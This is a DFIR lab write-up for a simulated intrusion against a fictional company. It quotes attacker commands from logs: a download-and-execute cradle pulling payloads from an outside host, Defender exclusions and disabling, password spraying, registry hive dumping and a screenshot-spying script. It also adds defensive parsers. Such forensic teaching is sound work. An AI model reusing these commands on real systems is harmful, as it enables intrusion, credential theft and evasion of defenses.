Airbuzzed from Xintra.org is a DFIR lab that simulates a full attack chain against a fictional company called Airbuzz. This write-up walks through how I approached each category of questions, covering social engineering, establishing persistence, DLL sideloading, credential dumping, defense evasion, exfiltration, payload execution, and network log analysis.
Social Engineering
Q1: During a review of the team’s conversation, we discovered that Rebecca Dean sent her public SSH keys to Robbert Carr. These keys are to be added to the code servers, enabling her to start working on the update for the aeromgmt project. Provide the exact SSH keys for Rebecca Dean.
This one I solved by looking through the .pst file in XstReader and finding the message containing the key.
Q2: Upon reviewing the team’s chat, it was noted that Rebecca asked Robert Carr to add a specific part of the code to app.py after any of the existing routes. Could you confirm when Rebecca sent this request to Robert via Teams? Answer should be in UTC format
Again, by looking through the individual messages I found the one that mentioned routes and looked like Python code. To find the exact timestamp I needed to open the properties for the message; the timestamp was under the field named ``.
Q3: As Rebecca Dean was tricked into downloading the file quiz.rar from LinkedIn, she was unaware that it contained malicious files. During the investigation, we found metadata within the Zone.Identifier ADS for quiz.rar. Which URL indicates the original source from where quiz.rar was downloaded? Provide the full URL.
I tried to see if the ADS was still present on the file in the malware triage with Get-Item quiz.rar -Stream *, but there was no Zone.Identifier stream attached to it. I pivoted to ELK and found that the host had Sysmon: event ID 15 (FileCreateStreamHash) records the creation of an alternate data stream and, for a small text stream like Zone.Identifier, its Contents field carries the stream's text, so the URLs were still there even though the stream itself was gone.
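As an added example (not part of the original write-up), here is a small Python parser for the Zone.Identifier text you get back either from Get-Content -Path quiz.rar -Stream Zone.Identifier or from the Contents field of a Sysmon event ID 15. The sample stream and its URLs are constructed placeholders; the real values for quiz.rar are in the lab's event. The point it makes is the one the question turns on: HostUrl is the URL the bytes were actually fetched from, ReferrerUrl is only the page that linked to it, and ZoneId 3 is the Internet zone (Mark of the Web).

```python
import configparser
from dataclasses import dataclass
from typing import Optional

# Constructed sample of a Zone.Identifier stream. The URLs are placeholders;
# the real ones for quiz.rar live in the lab's Sysmon event ID 15 Contents field.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://www.example.invalid/some-linked-page\r\n"
    "HostUrl=https://files.example.invalid/dl/quiz.rar\r\n"
)

# URLMON security zones as written into ZoneId.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}


@dataclass
class ZoneTransfer:
    zone_id: int
    zone_name: str
    referrer_url: Optional[str]
    host_url: Optional[str]

    @property
    def download_source(self) -> Optional[str]:
        # HostUrl is where the file came from; ReferrerUrl is only the linking page.
        return self.host_url or self.referrer_url


def parse_zone_identifier(text: str) -> ZoneTransfer:
    # ELK often renders the Sysmon Contents field with literal "\r\n"; normalise both forms.
    text = text.replace("\\r\\n", "\n").replace("\r\n", "\n")
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case as written (ZoneId, HostUrl, ...)
    cp.read_string(text)
    if "ZoneTransfer" not in cp:
        raise ValueError("not a Zone.Identifier stream: missing [ZoneTransfer] section")
    sec = cp["ZoneTransfer"]
    zone_id = int(sec.get("ZoneId", "3"))
    return ZoneTransfer(
        zone_id=zone_id,
        zone_name=ZONE_NAMES.get(zone_id, "Unknown"),
        referrer_url=sec.get("ReferrerUrl"),
        host_url=sec.get("HostUrl"),
    )


if __name__ == "__main__":
    zt = parse_zone_identifier(SAMPLE_STREAM)
    print(f"Zone {zt.zone_id} ({zt.zone_name}); downloaded from {zt.download_source}")
```

Older Sysmon builds only log the hash of the stream, not its contents, so if the Contents field is missing you are back to the triage image or the browser history for the URL.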
Q4: Upon analyzing the quiz.rar, it contains a file that can reveal the hostname of the attacker. Provide the hostname.
This one took me some time. Unpacking quiz.rar revealed several files, including a few PE files, and I thought I had to find something in the compile information with PEStudio. It turned out that the .lnk file contained what I was looking for: parsing it with Eric Zimmerman's LECmd revealed a UNC path embedded in the shortcut, which gives the hostname.
Q5: On June 21st, Rebecca Dean instructed Robert Carr to add a Python package to the requirements.txt file. What is the name of the Python package?
Again, looked through the mails.
Patient Zero
Q1: To establish persistence, the threat actor needs to create a task that runs periodically. When did the threat actor create the malicious scheduled task set to execute at system startup on ABZ-PC-01? Answer should be in UTC format
First I filtered ELK and the local event logs for event ID 4698 (A scheduled task was created). There were no hits on that event ID (it only lands in the Security log when Audit Other Object Access Events is enabled), but event ID 106 (Task registered) from Microsoft-Windows-TaskScheduler/Operational showed a lot of tasks being created.
I went through them all and noticed a strange one called \HPSync02. Searching for it in ELK turned up PowerShell transcripts showing schtasks /create /tn HPSync02 /tr "c:\\Windows\\Temp\\servicehost.exe" /sc onstart /ru System. The same command also showed up in Sysmon event ID 1 (process creation).
I went back to the Task Scheduler event log and took the timestamp from there.
Q2: As a follow-up question, what is the name and process ID of the parent process that spawned the schtasks.exe process used to create the scheduled task? Please provide the full path of the executable followed by the process ID, separated by a semicolon (;).
The Sysmon process creation event shows the ParentImage along with the ParentProcessId.
Q3: During the investigation of the suspicious scheduled task created by schtasks.exe, which file was identified as the malicious executable to be executed? Provide the full path.
I checked the pwsh transcript logs for it, and it was already visible in the schtasks command from when the task was created.
Q4: The threat actor was observed to be using some sort of RMM (Remote Monitoring and Management) tool to move laterally and gain persistence to the compromised systems. By analyzing the ABZ-FS-01 server, can you give the exact service name that was created on 2024-06-25 09:06:12?
I started by looking in the Prefetch (which I was kinda surprised to find on a server, since it is off by default there, but whatever) and noticed entries called MESHAGENT.EXE-88776BB8.pf and TACTICALAGENT-V2.7.0-WINDOWS--6BF8F6A1.pf, which stood out to me. I tracked them down to https://docs.tacticalrmm.com/install_agent/.
I followed the lead in ELK and found a pwsh transcript containing the installation:
$innosetup = 'tacticalagent-v2.7.0-windows-amd64.exe'
$api = '"https://api.downloadmirror.net"'
$clientid = '1'
$siteid = '1'
$agenttype = '"server"'
$power = 0
$rdp = 1
$ping = 0
$auth = '"efdc11b9169715cf59584b252ce0945b1192a8b009eaad6fac33386dd3ddcb6b"'
$downloadlink = 'https://github.com/amidaware/rmmagent/releases/download/v2.7.0/tacticalagent-v2.7.0-windows-amd64.exe'
$apilink = $downloadlink.split('/')
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$serviceName = 'tacticalrmm'
If (Get-Service $serviceName -ErrorAction SilentlyContinue) {
write-host ('Tactical RMM Is Already Installed')
} Else {
$OutPath = $env:TMP
$output = $innosetup
$installArgs = @('-m install --api ', "$api", '--client-id', $clientid, '--site-id', $siteid, '--agent-type', "$agenttype", '--auth', "$auth")
if ($power) {
$installArgs += "--power"
}
if ($rdp) {
$installArgs += "--rdp"
}
if ($ping) {
$installArgs += "--ping"
}
Try
{
$DefenderStatus = Get-MpComputerStatus | select AntivirusEnabled
if ($DefenderStatus -match "True") {
Add-MpPreference -ExclusionPath 'C:\Program Files\TacticalAgent\*'
Add-MpPreference -ExclusionPath 'C:\Program Files\Mesh Agent\*'
Add-MpPreference -ExclusionPath 'C:\ProgramData\TacticalRMM\*'
}
}
...
I then looked at services being created within that exact time window. I filtered for Sysmon event ID 13 (registry value set), since creating a service writes the service's values under HKLM\SYSTEM\CurrentControlSet\Services\<name>; the System log's event ID 7045 (a service was installed) is the other place to confirm it. I looked at the DisplayName value and found the service name. It was quite annoying because at first I thought the name was just tacticalrmm.
Dll Side loading
Q1: We observed a malicious DLL named 354465_SB_SMBUS_SDK.dll, which executes PowerShell scripts via rundll32 and was downloaded from the threat actor’s C2 server. Upon investigating the ABZ-PC-01 system, when was the first process associated with this DLL created? Additionally, who was the user that executed it?
I remembered that while looking for the Tactical RMM question in the rdean PowerShell transcripts, I had noticed rundll32 being invoked:
Host Application: rundll32 C:\Windows\Temp\354465_SB_SMBUS_SDK.dll,main
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String
(YwBwACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAHcAYgBlAG0AXABXAE0ASQBDAC4AZQB4AGUAIABDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcAFIAdABrAEIAdABNAGEAbgBTAGUAcgB2AC4AZQB4AGUA))
| iex
So rundll32 loads 354465_SB_SMBUS_SDK.dll and calls its exported main, which hosts PowerShell in-process (hence the transcript's Host Application line, with no powershell.exe involved). The command passed to it base64-decodes a UTF-16LE string ([Text.Encoding]::Unicode) and pipes the result into Invoke-Expression, so the real command runs in memory and never touches disk.
Classic LOLBAS https://lolbas-project.github.io/lolbas/Binaries/Rundll32/
The nice thing about PowerShell transcripts is that the header stores a lot of valuable information:
Start time: 20240625082640
Username: AIRBUZZ\rdean
RunAs User: AIRBUZZ\rdean
Configuration Name:
However, apparently this was not the correct timestamp, as I had to find the execution timestamp from Sysmon in ELK, and the two were off by 1 second. Could be caused by different time resolutions or rounding.
Q2: After the threat actor dropped the 354465_SB_SMBUS_SDK.dll, it immediately performed execution with some base64 strings on it. Decode the whole value of the b64 strings as part of the execution and provide the full decoded values
The base64 decodes (as UTF-16LE) to: cp C:\Windows\System32\wbem\WMIC.exe C:\Windows\Temp\RtkBtManServ.exe, which copies the legitimate WMIC.exe into the staging directory under a new name.
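Decoding these by hand in CyberChef works, but it is worth having a script that pulls every encoded blob out of a transcript and decodes it with the right encoding. The following is an added example (my own code, not from the lab or the write-up): it takes the transcript lines quoted above, extracts the argument of FromBase64String, and decodes it as UTF-16LE, which is what [Text.Encoding]::Unicode and -EncodedCommand both use. It goes a little beyond the transcript above by also matching the -EncodedCommand / -e / -enc forms and by falling back to UTF-8 for blobs that are not UTF-16 (e.g. a download cradle encoded with [Text.Encoding]::UTF8), detecting the difference by the NUL high bytes of ASCII text in UTF-16LE.

```python
import base64
import re

# Transcript excerpt reproduced from the write-up above: the rundll32 host line
# and the one-liner it ran. The base64 blob is the one shown in the transcript.
TRANSCRIPT = r"""Host Application: rundll32 C:\Windows\Temp\354465_SB_SMBUS_SDK.dll,main
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String
(YwBwACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAHcAYgBlAG0AXABXAE0ASQBDAC4AZQB4AGUAIABDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcAFIAdABrAEIAdABNAGEAbgBTAGUAcgB2AC4AZQB4AGUA))
| iex
"""

# Two places a blob hides in PowerShell: FromBase64String( ... ), tolerating the
# line break and optional quotes, and the -EncodedCommand family of switches.
B64_PATTERNS = [
    re.compile(r"FromBase64String\s*\(\s*['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\)"),
    re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE),
]


def decode_powershell_b64(blob: str) -> str:
    raw = base64.b64decode(blob, validate=True)
    # [Text.Encoding]::Unicode is UTF-16LE (same as -EncodedCommand). For ASCII text
    # every second byte is NUL, which is how we tell it apart from a UTF-8 blob.
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def encode_powershell_b64(text: str) -> str:
    # Inverse of the above, handy for building test vectors or a detection rule.
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def extract_encoded_commands(transcript: str) -> list:
    found = []
    for pattern in B64_PATTERNS:
        found.extend(decode_powershell_b64(m) for m in pattern.findall(transcript))
    return found


if __name__ == "__main__":
    for cmd in extract_encoded_commands(TRANSCRIPT):
        print(cmd)
```

Run against a whole transcript directory and you get every hidden command in one pass; here the only one is the cp that stages the renamed WMIC.exe, which is the copy used in the next question.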
Q3: The threat actor used DLL sideloading to execute their payload. They utilized the known staging directory to stage their toolkits and downloaded an original Microsoft Windows binary, renaming it in the process. Can you identify the original Windows binary name into which C:\Windows\Temp\wbemcomn.dll was loaded as part of the threat actor’s DLL sideloading technique?
In ELK I wildcard-searched for the DLL name and found a command line showing:
CommandLine: "C:\Windows\Temp\RtkBtManServ.exe" /node:10.0.2.5 process call create
"powershell.exe -c iwr -Uri https://update.downloadmirror.net/programs/servicehost.exe -OutFile C:\\Windows\\Temp\\servicehost.exe ;
iwr -Uri https://update.downloadmirror.net/programs/wbemc.dll -OutFile C:\\Windows\\Temp\\wbemc.dll ;
iwr -Uri https://update.downloadmirror.net/programs/wbemcomn.dll -OutFile C:\\Windows\\Temp\\wbemcomn.dll ;
C:\\Windows\\Temp\\servicehost.exe"
which shows RtkBtManServ.exe (the renamed WMIC.exe) using WMI's process call create against node 10.0.2.5 to launch a PowerShell download cradle that writes three files (servicehost.exe, wbemc.dll and wbemcomn.dll) to C:\Windows\Temp\ and then runs C:\\Windows\\Temp\\servicehost.exe.
I dug into this process with a KQL query over the Sysmon process creation events:
host.name: "abz-pc-01" AND
*servicehost.exe* AND
event.code: "1" AND *Temp*
This revealed that the OriginalFileName field for servicehost.exe is Wmiprvse.exe.
This is DLL sideloading. The DLLs are dropped in the same directory as the renamed wmiprvse.exe, which hijacks the DLL search order: the loader checks the application's own directory before the system directories, and since wbemcomn.dll is not on the KnownDLLs list that protection does not apply, so the copy in C:\Windows\Temp is loaded instead of the legitimate one under System32\wbem. (https://www.mdsec.co.uk/2020/10/i-live-to-move-it-windows-lateral-movement-part-3-dll-hijacking/)
Credential Dumping
Q1: To gain additional access to user accounts within the network, the threat actor executed a password spraying attack against multiple accounts. What is the name of the specific PowerShell function they utilized for this task?
Again, looking through the pwsh transcripts for rdean reveals a lot. The threat actor used Invoke-DomainPasswordSpray from https://github.com/dafthack/DomainPasswordSpray to spray a single password:
Invoke-DomainPasswordSpray -Password "Airbuzz@2024" -Domain "AIRBUZZ" -Force;
>> CommandInvocation(Out-String): "Out-String"
**********************
Command start time: 20240622013632
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="[*] The domain password policy observation window is set to 10 minutes."
>> ParameterBinding(Out-String): name="InputObject"; value="[*] Setting a 10 minute wait in between sprays."
>> ParameterBinding(Out-String): name="InputObject"; value="[*] Password spraying has begun with 1 passwords"
>> ParameterBinding(Out-String): name="InputObject"; value="[*] This might take a while depending on the total number of users"
**********************
Command start time: 20240622013632
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="[*] Now trying password Airbuzz@2024 against 13 users. Current time is 1:36 AM"
>> ParameterBinding(Out-String): name="InputObject"; value="[*] Writing successes to "
**********************
From the transcript output it didn't appear that there were any successes.
Q2: What password did the threat actor attempt to spray on all users?
Look at the -Password argument of the cmdlet above.
Q3: Rebecca’s password was saved in her Chrome browser and potentially retrieved by the threat actor using PowerShell. What is the password Rebecca used for her Gmail account?
The pwsh transcripts revealed that the TA used a tool called extract.exe to create winlog0.dat, which had the following content:
PS>Get-Content C:\\Windows\\Temp\\winlog0.dat
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="=================================================="
>> ParameterBinding(Out-String): name="InputObject"; value="Origin URL : https://login.microsoftonline.com/"
>> ParameterBinding(Out-String): name="InputObject"; value="Action URL : "
>> ParameterBinding(Out-String): name="InputObject"; value="User Name Field : "
>> ParameterBinding(Out-String): name="InputObject"; value="Password Field : "
>> ParameterBinding(Out-String): name="InputObject"; value="User Name : "
>> ParameterBinding(Out-String): name="InputObject"; value="Password : "
>> ParameterBinding(Out-String): name="InputObject"; value="Created Time : 6/3/2024 9:29:14 AM"
>> ParameterBinding(Out-String): name="InputObject"; value="Password Strength : Very Weak"
>> ParameterBinding(Out-String): name="InputObject"; value="Password File : C:\Users\rdean\AppData\Local\Google\Chrome\User Data\Default\Login Data"
(...)
The hash of extract.exe is SHA256 a1d5b76cf39643d1ce4e5835aa5af91ed96dc924c841263cae407eec3e5dd420, which is ChromePass from NirSoft.
However, I couldn't find a Gmail account; there were only entries for canva.com and linkedin.com. The password for the LinkedIn account was the right one, which is kinda misleading if you read the question and try to find a Gmail entry. I guess she reuses passwords.
Q4: The threat actor also used another binary for credential access, using a custom keylogger downloaded from their known C2 server. The executable “Proactive.exe” was downloaded by the user rdean on ABZ-PC-01. Can you provide the exact date and time (in UTC) when this binary was created on the disk?
Since the host had Sysmon, event ID 11 (FileCreate) in ELK gives the creation time.
I correlated this timestamp with the $MFT entry for the file and got the same timestamp.
Q5: In the PowerShell script designed to take periodic screenshots, what is the interval, in seconds, between each screenshot? Provide the answer as a numeric value.
I spotted a pwsh script called "WindowsUpdate.ps1" in C:\Windows\Temp, the same staging dir the TA used. That's kinda odd. Looking into the script revealed:
$a='Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName System.Drawing;
function Generate-RandomFileName {$length=Get-Random -Minimum 5 -Maximum 13;$randomNumber=-join ((48..57)+(65..90)+(97..122)
(..)
{Take-Screenshot;Sleep 30}';iex $a
This is a PowerShell script that uses .NET (System.Windows.Forms and System.Drawing) to take screenshots of the screen, save them under AppData with a random filename, and repeat every 30 seconds (the Sleep 30 in the loop) in an infinite loop.
All the files are still located in \C\Users\rdean\AppData\Roaming\Microsoft\Windows\Themes as .dat files.
Q6: By analyzing the screenshots created by the custom PowerShell script used by the threat actor, it was discovered that a specific screenshot, named DMzhVyT.dat, contained stolen code. Can you provide the full path where the code on the screenshot is stored?
I found the file in that location and opened it with paint as it was a simple image - nothing fancy.
The image shows Notepad++ having the code opened. In the title of the Notepad++ window the path can be seen.
Q7: A sensitive file, creds.yml, was found on ABZ-APP-01, potentially containing credentials. What is the ‘access time’ of creds.yml?
This is a Linux system, and the triage images include a UAC (Unix-like Artifacts Collector) image of the host.
I always check the bodyfile because, as the docs say:
The body file is an intermediate file when creating a timeline of file activity. source: https://wiki.sleuthkit.org/index.php?title=Body_file
With this format:
MD5|name|inode|mode_as_string|UID|GID|size|atime|mtime|ctime|crtime
Note that the timestamps are Unix epoch seconds and have to be converted to UTC, e.g. with https://www.unixtimestamp.com/ or date -u -d @<epoch>.
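Rather than pasting each epoch into a website, it is quicker to parse the bodyfile directly. The following is an added example (my code, not the lab's or the Sleuth Kit's) that splits the pipe-delimited format quoted above, converts the four timestamps to UTC, and flattens them into a sorted mactime-style list. The two rows are constructed to match the format; they are not the real creds.yml entry from ABZ-APP-01. Note the 0/-1 convention for "timestamp not recorded", which a naive conversion would turn into 1970.

```python
from datetime import datetime, timezone

# Constructed bodyfile rows in the Sleuth Kit format quoted above
# (MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime). Not the lab's real entries.
SAMPLE_BODYFILE = (
    "0|/opt/app/creds.yml|131094|-rw-r-----|1000|1000|412|1719312345|1718971200|1718971200|1718964000\n"
    "0|/home/app/.bash_history|131201|-rw-------|1000|1000|2048|1719313000|1719312999|1719312999|1718900000\n"
)

FIELDS = ["md5", "name", "inode", "mode", "uid", "gid", "size", "atime", "mtime", "ctime", "crtime"]
TIME_FIELDS = (("atime", "a"), ("mtime", "m"), ("ctime", "c"), ("crtime", "b"))  # b = born


def epoch_to_utc(value):
    """Convert an epoch-seconds string to 'YYYY-MM-DD HH:MM:SS UTC'; 0 or -1 means not recorded."""
    ts = int(value)
    if ts <= 0:
        return None
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def parse_bodyfile(text):
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split("|")
        if len(parts) != len(FIELDS):
            # A filename containing '|' or a truncated line; skip rather than misalign columns.
            continue
        row = dict(zip(FIELDS, parts))
        row["size"] = int(row["size"])
        for field, _ in TIME_FIELDS:
            row[field] = epoch_to_utc(row[field])
        rows.append(row)
    return rows


def find_file(rows, name_suffix):
    return [r for r in rows if r["name"].endswith(name_suffix)]


def timeline(rows):
    """Flatten to (time, macb flag, name) tuples, oldest first, like mactime output."""
    events = [(row[field], flag, row["name"]) for row in rows
              for field, flag in TIME_FIELDS if row[field]]
    return sorted(events)


if __name__ == "__main__":
    rows = parse_bodyfile(SAMPLE_BODYFILE)
    for r in find_file(rows, "creds.yml"):
        print(f'{r["name"]}: atime={r["atime"]} mtime={r["mtime"]} crtime={r["crtime"]}')
    for when, flag, name in timeline(rows):
        print(when, flag, name)
```

Keep in mind that on Linux the access time the question asks for is only as good as the mount options (relatime is the default on most distributions), so an atime can lag well behind the last real read.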
Browser History Insights
Q1: Based on the ABZ-PC-01, the user “rdean” has multiple Google searches recorded in their Chrome history logs. What was the search query used in the Google search performed at 9:14:08 AM on June 19, 2024
As we have the triage image of this host, with the Chrome user data under C:\Labs\Evidence\Airbuzzed\TriageImages\ABZ-PC-01\C\Users\rdean\AppData\Local\Google\Chrome\User Data, we can use a tool like Hindsight to parse the History database and find the search query.
I did have some trouble using the GUI app of Hindsight in this lab, which I usually don't; I don't know why.
Evasion Techniques
Q1: After gaining privileged access to a compromised account, the threat actor performed a defense evasion technique by adding a specific directory, where they staged their toolkits, to the antivirus exclusion list. Can you tell me when the threat actor performed this activity on ABZ-PC-01?
I feel like there are so many wins in the pwsh transcripts if you just spend the time looking through them. HOWEVER, the timestamp in there is wrong for this question: that's when the command was typed into the pwsh session. To find the exact time the configuration changed you have to go to the Defender provider, Microsoft-Windows-Windows Defender/Operational event ID 5007 (configuration changed), and take the TimeCreated from there:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Windows Defender" Guid="{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}" />
<EventID>5007</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2024-06-19T20:46:39.0001492Z" />
<EventRecordID>361</EventRecordID>
<Correlation />
<Execution ProcessID="3808" ThreadID="9492" />
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>ABZ-PC-01.internal.airbuzz.space</Computer>
<Security UserID="S-1-5-18" />
</System>
<EventData>
<Data Name="Product Name">Microsoft Defender Antivirus</Data>
<Data Name="Product Version">4.18.24050.7</Data>
<Data Name="Old Value" />
<Data Name="New Value">HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\c:\windows\temp = 0x0</Data>
</EventData>
</Event>
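Since 5007 also fires for every other Defender setting change, it helps to pull out only the exclusion events and the path they add. The following is an added example (my code, not from the lab) that parses the event XML above with the standard library, reads TimeCreated and Computer from the System element, and uses a regex on New Value / Old Value to classify the change: an added exclusion appears in New Value, while a removed one leaves New Value empty and puts the old registry value in Old Value. The removal variant is constructed from the event above for illustration.

```python
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# The 5007 event reproduced from the write-up above (Event Viewer's collapse
# markers removed so that it is well-formed XML).
EVENT_5007 = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Windows Defender" Guid="{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}" />
    <EventID>5007</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>0</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8000000000000000</Keywords>
    <TimeCreated SystemTime="2024-06-19T20:46:39.0001492Z" />
    <EventRecordID>361</EventRecordID>
    <Correlation />
    <Execution ProcessID="3808" ThreadID="9492" />
    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
    <Computer>ABZ-PC-01.internal.airbuzz.space</Computer>
    <Security UserID="S-1-5-18" />
  </System>
  <EventData>
    <Data Name="Product Name">Microsoft Defender Antivirus</Data>
    <Data Name="Product Version">4.18.24050.7</Data>
    <Data Name="Old Value" />
    <Data Name="New Value">HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\c:\windows\temp = 0x0</Data>
  </EventData>
</Event>
"""

# Constructed counterpart: the same exclusion being removed (value moves to Old Value).
_EXCL = r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\c:\windows\temp = 0x0"
EVENT_5007_REMOVAL = (EVENT_5007
    .replace('<Data Name="Old Value" />', f'<Data Name="Old Value">{_EXCL}</Data>')
    .replace(f'<Data Name="New Value">{_EXCL}</Data>', '<Data Name="New Value" />'))

EXCLUSION_RE = re.compile(
    r"^HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\(Paths|Extensions|Processes)\\(.+?)\s*=\s*0x0$",
    re.IGNORECASE,
)


def parse_defender_5007(xml_text):
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    data = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    event = {
        "event_id": int(system.find("e:EventID", NS).text),
        "time": system.find("e:TimeCreated", NS).get("SystemTime"),
        "computer": system.find("e:Computer", NS).text,
        "old_value": data.get("Old Value", ""),
        "new_value": data.get("New Value", ""),
        "change": None, "exclusion_type": None, "exclusion": None,
    }
    if event["event_id"] != 5007:
        return event
    # Added exclusion: path sits in New Value. Removed: New Value empty, path in Old Value.
    for field, change in (("new_value", "added"), ("old_value", "removed")):
        m = EXCLUSION_RE.match(event[field])
        if m:
            event.update(change=change, exclusion_type=m.group(1), exclusion=m.group(2))
            break
    return event


if __name__ == "__main__":
    for ev in (parse_defender_5007(EVENT_5007), parse_defender_5007(EVENT_5007_REMOVAL)):
        print(ev["time"], ev["computer"], ev["change"], ev["exclusion_type"], ev["exclusion"])
```

Feed it the XML view of every 5007 in the channel and the added-path exclusions on the staging directory drop straight out, with the Defender-side timestamp rather than the transcript one.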
Q2: Regarding the AV exclusion on ABZ-PC-01, can you provide the full directory path that was added to the AV exclusion list?
Ez pz
Q3: By analyzing the UAC output, you find the bash history of the app user and may identify several deletion events executed by the attacker as part of their defense evasion techniques. Can you provide the file name (including the extension) of the first file that was removed?
We had the UAC output for ABZ-APP-01 which also fetched the bash history file.
Q4: A renamed binary was utilized to remotely execute a PowerShell script aimed at disabling Windows Defender as part of the threat actor’s defense evasion techniques. Can you provide the complete name of this binary, including its file extension?
I assumed this was related to the wmic activity seen earlier, so I searched ELK for process.pe.original_file_name: wmic.exe, which gave me 8 results.
The first result was related to the DLL sideloading previously, but the next one was related to defense evasion by disabling defender.
CommandLine: "C:\Windows\Temp\RtkBtManServ.exe" /node:10.0.2.4 process call create
"powershell.exe -c Set-MpPreference -DisableIntrusionPreventionSystem True -DisableIOAVProtection True -DisableRealtimeMonitoring True
-DisableScriptScanning True -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force
-MAPSReporting Disabled -SubmitSamplesConsent NeverSend"
Q5: Robert Carr deleted a file on PC02 on 2024-06-19 at 07:02:21. What was the file size of the deleted item?
This one was quite easy, as KAPE modules had already been run on the triage image, leaving us with output from https://github.com/EricZimmerman/RBCmd, which parses the recycle bin $I metadata files and contains the file size (https://github.com/EricZimmerman/RBCmd/blob/master/RBCmd/CsvOut.cs#L8).
Exfiltration
Q1: While investigating ABZ-DC-01, user “kmason” executed a command using “reg.exe” on June 25, 2024, at 08:57:09 AM. What was the output file specified for saving the HKLM\SAM registry key?
I used ELK for this one: process.name: reg.exe and agent.name: "ABZ-DC-01" and event.code: 1
The threat actor exported several hives with reg.exe, saving them with a .json extension, e.g.:
reg save hklm\system C:\\Windows\\Temp\\Software.json
I guess he is saving them as .json files to evade static detection rules.
Q2: A threat actor was observed performing staging on ABZ-DC-01 by aggregating .json files into a single location. What was the password used for the archive during the data exfiltration process
I checked the pwsh transcripts on the DC xd.
Q3: Following the successful data staging of the SAM and System hives dumps on ABZ-DC-01, what is the name of the compressed file created by the threat actor? Give the full path of the file.
It shows in the output of the transcript.
Q4: What is the file size, in bytes, of the compressed file created by the threat actor during the data exfiltration stage on ABZ-DC-01?
Used the $MFT to find the filesize.
Payload Execution
Q1: PC02 consists of interesting evidence of execution. What’s the SHA1 hash value of c:\windows\temp\servicehost.exe?
Sysmon event ID 29 (FileExecutableDetected), which records the hashes of executables written to disk, is also in ELK, and I used that here.
Q2: What is the process ID of the suspected TA’s C2 agent found on ABZ-APP-01, which was executed on June 21 at 11:34
I looked at the ps output in the UAC live_response directory, which shows when each process was started along with its process ID.
Q3: Based on the identified process ID of the suspected C2 agent, provide its MD5 hash
UAC hashes all running processes with MD5 and writes that into the live_response output. Use the previously found PID to correlate and find the MD5.
Q4: Who is the user that owns the process with PID 55773, which was started on Fri Jun 21 11:33:57 2024 and is running the executable at /tmp/lock?
Looking at the process output, we can see the owner.
Dissecting Network Logs
Q1: By analyzing the PCAP file using Zeek’s ZUI, we can easily see the Suricata alerts that are triggered after importing the entire PCAP file. You may also notice that the internal IP address 10.0.3.4 was connected to an external IP suspected to be the command and control (C2) channel of the threat actor. What is the threat actor’s C2 IP address?
This one I found using Sysmon event ID 22 (DNS query) in ELK; I didn't actually end up using the pcap for this.
Q2: After obtaining the C2 IP address of the threat actor, what host or domain does it resolve to?
Same as Q1.
Q3: For the PCAP file, we also need to look for DNS entries in Zui. While checking, we also observed DNS queries related to a known RMM tool. Provide the exact DNS query related to RMM
_path=="dns" and id.orig_h==10.0.3.4 | count() by query
Q4: In the NGINX access logs on ABZ-PRX-01 from June 21, 2024, what user agent is associated with the multiple /testing POST requests made by the IP address 194.195.245.225, which is one of the IP addresses of the threat actor?
Quite easy to find in the ELK nginx data view.
Mapping the Infrastructure
Q1: ABZ-APP-01 contains a lot of important information of the Airbuzz as a company. What is the OS kernel build number of this Linux server?
Found it in the dmesg output in the UAC live_response directory.
Threat Actors’ Arsenal
Q1: Although we have identified the suspected C2 agent on ABZ-APP-01, we still need to determine the C2 domain used by the threat actor when running this agent. Can you provide the full domain of the attacker’s C2?
I spent way too long looking in the UAC output before realising that we actually have the beacon in the malware folder.
I used Sysinternals strings on the file to see if I could hit the domain:
